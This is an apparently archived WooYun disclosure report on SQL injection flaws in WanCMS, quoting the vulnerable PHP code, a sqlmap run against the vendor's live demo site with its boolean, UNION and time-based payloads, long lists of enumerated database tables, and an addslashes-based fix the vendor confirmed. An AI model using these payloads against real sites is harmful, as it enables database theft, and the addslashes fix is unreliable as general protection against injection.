当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049372

漏洞标题:WanCMS 多处SQL注射(源码详析+实站演示)

相关厂商:wancms.com

漏洞作者: lxj616

提交时间:2014-01-26 19:21

修复时间:2014-04-26 19:22

公开时间:2014-04-26 19:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-26: 细节已通知厂商并且等待厂商处理中
2014-01-28: 厂商已经确认,细节仅向厂商公开
2014-01-31: 细节向第三方安全合作伙伴开放
2014-03-24: 细节向核心白帽子及相关领域专家公开
2014-04-03: 细节向普通白帽子公开
2014-04-13: 细节向实习白帽子公开
2014-04-26: 细节向公众公开

简要描述:

WanCMS 多处SQL注射 已经在官网演示注射,可致使所有数据库信息泄露(仅演示至跑表,足矣)
举一例分析,并给出通用的修复建议

详细说明:

举一例分析:
/app/Lib/Action/AccountsAction.class.php line:570

//之前代码略,为 public function forget_password_s() 
		$username = $_GET ['username'];
                //直接获取username,为什么不用框架封装的方法取得?
		$ucresult = uc_user_checkname ( $username );
		if ($ucresult != '-3') {
			// Header("Location: /accounts/forget_password");
		}
                //测试时使用的吧?没有用处
		$this->assign ( 'username', $username );
		$member = M ( 'member' );
		$u_info = $member->where ( "username ='" . $username . "'" )->find ();
                //上面这句将username直接带入查询,引发了注射
		$this->assign ( 'u_info', $u_info );
		$this->assign ( 'username', $username );
//之后代码略,与本漏洞无关


其他注射位置:
/app/Lib/Action/LicenseAction.class.php 开头没几行

public function search(){
		$domain = $_GET['domain'];
		$authorization = M("authorization"); // 实例化authorization对象
		$info = $authorization->where("domain ='".$domain."'")->find();
		if(empty($info)){
			echo  "document.write('<a href='http://demo.31wan.cn/license/'>未授权</a>')";
		}else{
			echo "document.write('已授权')";
		}
	}


又是直接GET进查询语句,是不是都同样的道理呢?
这样的注射还有很多,就不分开提交通知了
下面进行sqlmap跑表,仅列出部分表名,理论上可以获取全部信息

漏洞证明:

演示:

C:\Users\Administrator>sqlmap.py -u "http://test4.31wan.cn/accounts/forget_password_s?username=lxj616" --tables


sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=lxj616') AND 3329=3329 AND ('MGNe'='MGNe
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: username=-5677') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71756c7171,0x6a6546534662544b6c64,0x7168676871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=lxj616') AND SLEEP(5) AND ('vuGA'='vuGA
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
Database: anzhuang
[38 tables]
+---------------------------------------+
| mygame_activities                     |
| mygame_activitiestype                 |
| mygame_ad                             |
| mygame_ad_where                       |
| mygame_admin_exec_log                 |
| mygame_admin_login_error              |
| mygame_admin_pay                      |
| mygame_admin_role                     |
| mygame_article                        |
| mygame_card                           |
| mygame_card_log                       |
| mygame_card_type                      |
| mygame_category                       |
| mygame_category_list                  |
| mygame_cps                            |
| mygame_first_recharge                 |
| mygame_game                           |
| mygame_game_log                       |
| mygame_gametype                       |
| mygame_link                           |
| mygame_manager                        |
| mygame_member                         |
| mygame_member_bank                    |
| mygame_member_extend_info             |
| mygame_mobilegame                     |
| mygame_notice                         |
| mygame_pay_ok                         |
| mygame_pay_type                       |
| mygame_role                           |
| mygame_role_access                    |
| mygame_server                         |
| mygame_soical_login                   |
| mygame_spend_log                      |
| mygame_statistical                    |
| mygame_web_not_allow_ip               |
| mygame_webconfig                      |
| mygame_websdk                         |
| mygame_yzdx                           |
+---------------------------------------+
Database: 3937
[30 tables]
+---------------------------------------+
| mygame_ad                             |
| mygame_ad_where                       |
| mygame_admin_exec_log                 |
| mygame_admin_login_error              |
| mygame_admin_pay                      |
| mygame_admin_role                     |
| mygame_article                        |
| mygame_card                           |
| mygame_card_log                       |
| mygame_category                       |
| mygame_category_list                  |
| mygame_cps                            |
| mygame_flash                          |
| mygame_game                           |
| mygame_game_log                       |
| mygame_gametype                       |
| mygame_link                           |
| mygame_manager                        |
| mygame_member                         |
| mygame_member_extend_info             |
| mygame_menu                           |
| mygame_pay_ok                         |
| mygame_pay_type                       |
| mygame_role_access                    |
| mygame_server                         |
| mygame_soical_login                   |
| mygame_spend_log                      |
| mygame_statistical                    |
| mygame_web_not_allow_ip               |
| mygame_webconfig                      |
+---------------------------------------+
Database: 31wanbbs
[293 tables]
+---------------------------------------+
| pre_common_admincp_cmenu              |
| pre_common_admincp_group              |
| pre_common_admincp_member             |
| pre_common_admincp_perm               |
| pre_common_admincp_session            |
| pre_common_admingroup                 |
| pre_common_adminnote                  |
| pre_common_advertisement              |
| pre_common_advertisement_custom       |
| pre_common_banned                     |
| pre_common_block                      |
| pre_common_block_favorite             |
| pre_common_block_item                 |
| pre_common_block_item_data            |
| pre_common_block_permission           |
| pre_common_block_pic                  |
| pre_common_block_style                |
| pre_common_block_xml                  |
| pre_common_cache                      |
| pre_common_card                       |
| pre_common_card_log                   |
| pre_common_card_type                  |
| pre_common_connect_guest              |
| pre_common_credit_log                 |
| pre_common_credit_log_field           |
| pre_common_credit_rule                |
| pre_common_credit_rule_log            |
| pre_common_credit_rule_log_field      |
| pre_common_cron                       |
| pre_common_devicetoken                |
| pre_common_district                   |
| pre_common_diy_data                   |
| pre_common_domain                     |
| pre_common_failedip                   |
| pre_common_failedlogin                |
| pre_common_friendlink                 |
| pre_common_grouppm                    |
| pre_common_invite                     |
| pre_common_magic                      |
| pre_common_magiclog                   |
| pre_common_mailcron                   |
| pre_common_mailqueue                  |
| pre_common_member                     |
| pre_common_member_action_log          |
| pre_common_member_connect             |
| pre_common_member_count               |
| pre_common_member_crime               |
| pre_common_member_field_forum         |
| pre_common_member_field_home          |
| pre_common_member_forum_buylog        |
| pre_common_member_grouppm             |
| pre_common_member_log                 |
| pre_common_member_magic               |
| pre_common_member_medal               |
| pre_common_member_newprompt           |
| pre_common_member_profile             |
| pre_common_member_profile_setting     |
| pre_common_member_security            |
| pre_common_member_secwhite            |
| pre_common_member_stat_field          |
| pre_common_member_status              |
| pre_common_member_validate            |
| pre_common_member_verify              |
| pre_common_member_verify_info         |
| pre_common_myapp                      |
| pre_common_myinvite                   |
| pre_common_mytask                     |
| pre_common_nav                        |
| pre_common_onlinetime                 |
| pre_common_optimizer                  |
| pre_common_patch                      |
| pre_common_plugin                     |
| pre_common_pluginvar                  |
| pre_common_process                    |
| pre_common_regip                      |
| pre_common_relatedlink                |
| pre_common_remote_port                |
| pre_common_report                     |
| pre_common_searchindex                |
| pre_common_seccheck                   |
| pre_common_secquestion                |
| pre_common_session                    |
| pre_common_setting                    |
| pre_common_smiley                     |
| pre_common_sphinxcounter              |
| pre_common_stat                       |
| pre_common_statuser                   |
| pre_common_style                      |
| pre_common_stylevar                   |
| pre_common_syscache                   |
| pre_common_tag                        |
| pre_common_tagitem                    |
| pre_common_task                       |
| pre_common_taskvar                    |
| pre_common_template                   |
| pre_common_template_block             |
| pre_common_template_permission        |
| pre_common_uin_black                  |
| pre_common_usergroup                  |
| pre_common_usergroup_field            |
| pre_common_visit                      |
| pre_common_word                       |
| pre_common_word_type                  |
| pre_connect_disktask                  |
| pre_connect_feedlog                   |
| pre_connect_memberbindlog             |
| pre_connect_postfeedlog               |
| pre_connect_tthreadlog                |
| pre_forum_access                      |
| pre_forum_activity                    |
| pre_forum_activityapply               |
| pre_forum_announcement                |
| pre_forum_attachment                  |
| pre_forum_attachment_0                |
| pre_forum_attachment_1                |
| pre_forum_attachment_2                |
| pre_forum_attachment_3                |
| pre_forum_attachment_4                |
| pre_forum_attachment_5                |
| pre_forum_attachment_6                |
| pre_forum_attachment_7                |
| pre_forum_attachment_8                |
| pre_forum_attachment_9                |
| pre_forum_attachment_exif             |
| pre_forum_attachment_unused           |
| pre_forum_attachtype                  |
| pre_forum_bbcode                      |
| pre_forum_collection                  |
| pre_forum_collectioncomment           |
| pre_forum_collectionfollow            |
| pre_forum_collectioninvite            |
| pre_forum_collectionrelated           |
| pre_forum_collectionteamworker        |
| pre_forum_collectionthread            |
| pre_forum_creditslog                  |
| pre_forum_debate                      |
| pre_forum_debatepost                  |
| pre_forum_faq                         |
| pre_forum_filter_post                 |
| pre_forum_forum                       |
| pre_forum_forum_threadtable           |
| pre_forum_forumfield                  |
| pre_forum_forumrecommend              |
| pre_forum_groupcreditslog             |
| pre_forum_groupfield                  |
| pre_forum_groupinvite                 |
| pre_forum_grouplevel                  |
| pre_forum_groupuser                   |
| pre_forum_hotreply_member             |
| pre_forum_hotreply_number             |
| pre_forum_imagetype                   |
| pre_forum_medal                       |
| pre_forum_medallog                    |
| pre_forum_memberrecommend             |
| pre_forum_moderator                   |
| pre_forum_modwork                     |
| pre_forum_newthread                   |
| pre_forum_onlinelist                  |
| pre_forum_order                       |
| pre_forum_poll                        |
| pre_forum_polloption                  |
| pre_forum_polloption_image            |
| pre_forum_pollvoter                   |
| pre_forum_post                        |
| pre_forum_post_location               |
| pre_forum_post_moderate               |
| pre_forum_post_tableid                |
| pre_forum_postcache                   |
| pre_forum_postcomment                 |
| pre_forum_postlog                     |
| pre_forum_poststick                   |
| pre_forum_promotion                   |
| pre_forum_ratelog                     |
| pre_forum_relatedthread               |
| pre_forum_replycredit                 |
| pre_forum_rsscache                    |
| pre_forum_sofa                        |
| pre_forum_spacecache                  |
| pre_forum_statlog                     |
| pre_forum_thread                      |
| pre_forum_thread_moderate             |
| pre_forum_threadaddviews              |
| pre_forum_threadcalendar              |
| pre_forum_threadclass                 |
| pre_forum_threadclosed                |
| pre_forum_threaddisablepos            |
| pre_forum_threadhidelog               |
| pre_forum_threadhot                   |
| pre_forum_threadimage                 |
| pre_forum_threadlog                   |
| pre_forum_threadmod                   |
| pre_forum_threadpartake               |
| pre_forum_threadpreview               |
| pre_forum_threadprofile               |
| pre_forum_threadprofile_group         |
| pre_forum_threadrush                  |
| pre_forum_threadtype                  |
| pre_forum_trade                       |
| pre_forum_tradecomment                |
| pre_forum_tradelog                    |
| pre_forum_typeoption                  |
| pre_forum_typeoptionvar               |
| pre_forum_typevar                     |
| pre_forum_warning                     |
| pre_home_album                        |
| pre_home_album_category               |
| pre_home_appcreditlog                 |
| pre_home_blacklist                    |
| pre_home_blog                         |
| pre_home_blog_category                |
| pre_home_blog_moderate                |
| pre_home_blogfield                    |
| pre_home_class                        |
| pre_home_click                        |
| pre_home_clickuser                    |
| pre_home_comment                      |
| pre_home_comment_moderate             |
| pre_home_docomment                    |
| pre_home_doing                        |
| pre_home_doing_moderate               |
| pre_home_favorite                     |
| pre_home_feed                         |
| pre_home_feed_app                     |
| pre_home_follow                       |
| pre_home_follow_feed                  |
| pre_home_follow_feed_archiver         |
| pre_home_friend                       |
| pre_home_friend_request               |
| pre_home_friendlog                    |
| pre_home_notification                 |
| pre_home_pic                          |
| pre_home_pic_moderate                 |
| pre_home_picfield                     |
| pre_home_poke                         |
| pre_home_pokearchive                  |
| pre_home_share                        |
| pre_home_share_moderate               |
| pre_home_show                         |
| pre_home_specialuser                  |
| pre_home_userapp                      |
| pre_home_userappfield                 |
| pre_home_visitor                      |
| pre_mobile_setting                    |
| pre_mobileoem_member                  |
| pre_mobileoem_pushthreads             |
| pre_portal_article_content            |
| pre_portal_article_count              |
| pre_portal_article_moderate           |
| pre_portal_article_related            |
| pre_portal_article_title              |
| pre_portal_article_trash              |
| pre_portal_attachment                 |
| pre_portal_category                   |
| pre_portal_category_permission        |
| pre_portal_comment                    |
| pre_portal_comment_moderate           |
| pre_portal_rsscache                   |
| pre_portal_topic                      |
| pre_portal_topic_pic                  |
| pre_security_evilpost                 |
| pre_security_eviluser                 |
| pre_security_failedlog                |
| pre_ucenter_admins                    |
| pre_ucenter_applications              |
| pre_ucenter_badwords                  |
| pre_ucenter_domains                   |
| pre_ucenter_failedlogins              |
| pre_ucenter_feeds                     |
| pre_ucenter_friends                   |
| pre_ucenter_mailqueue                 |
| pre_ucenter_memberfields              |
| pre_ucenter_members                   |
| pre_ucenter_mergemembers              |
| pre_ucenter_newpm                     |
| pre_ucenter_notelist                  |
| pre_ucenter_pm_indexes                |
| pre_ucenter_pm_lists                  |
| pre_ucenter_pm_members                |
| pre_ucenter_pm_messages_0             |
| pre_ucenter_pm_messages_1             |
| pre_ucenter_pm_messages_2             |
| pre_ucenter_pm_messages_3             |
| pre_ucenter_pm_messages_4             |
| pre_ucenter_pm_messages_5             |
| pre_ucenter_pm_messages_6             |
| pre_ucenter_pm_messages_7             |
| pre_ucenter_pm_messages_8             |
| pre_ucenter_pm_messages_9             |
| pre_ucenter_protectedmembers          |
| pre_ucenter_settings                  |
| pre_ucenter_sqlcache                  |
| pre_ucenter_tags                      |
| pre_ucenter_vars                      |
+---------------------------------------+

修复方案:

使用你们自己框架带的安全函数

/**
     +----------------------------------------------------------
     * 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串
     +----------------------------------------------------------
     * @access public
     +----------------------------------------------------------
     * @param string $string 要处理的字符串
     +----------------------------------------------------------
     * @return string
     +----------------------------------------------------------
     */
    static public function addSlashes($string) {
        if (!get_magic_quotes_gpc()) {
            $string = addslashes($string);
        }
        return $string;
    }
    /**
     +----------------------------------------------------------
     * 从$_POST,$_GET,$_COOKIE,$_REQUEST等数组中获得数据
     +----------------------------------------------------------
     * @access public
     +----------------------------------------------------------
     * @param string $string 要处理的字符串
     +----------------------------------------------------------
     * @return string
     +----------------------------------------------------------
     */
    static public function getVar($string) {
        return Input::stripSlashes($string);
    }
    /**
     +----------------------------------------------------------
     * 如果 magic_quotes_gpc 为开启状态,这个函数可以反转义字符串
     +----------------------------------------------------------
     * @access public
     +----------------------------------------------------------
     * @param string $string 要处理的字符串
     +----------------------------------------------------------
     * @return string
     +----------------------------------------------------------
     */
    static public function stripSlashes($string) {
        if (get_magic_quotes_gpc()) {
            $string = stripslashes($string);
        }
        return $string;
    }


例:以第一个注射点为例进行修补

$username = addSlashes($_GET ['username']);
...
之后数据库中一律带着addSlashes接收
...
需要输出时(api、显示、或者就是需要原始数据)
$username_out = stripSlashes($username);


建议仔细排查代码中类似的注射点,用合理的方法修复(以上方法仅供参考)

版权声明:转载请注明来源 lxj616@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-28 13:46

厂商回复:

厂商会尽快修改 真诚感谢lxj616

最新状态:

暂无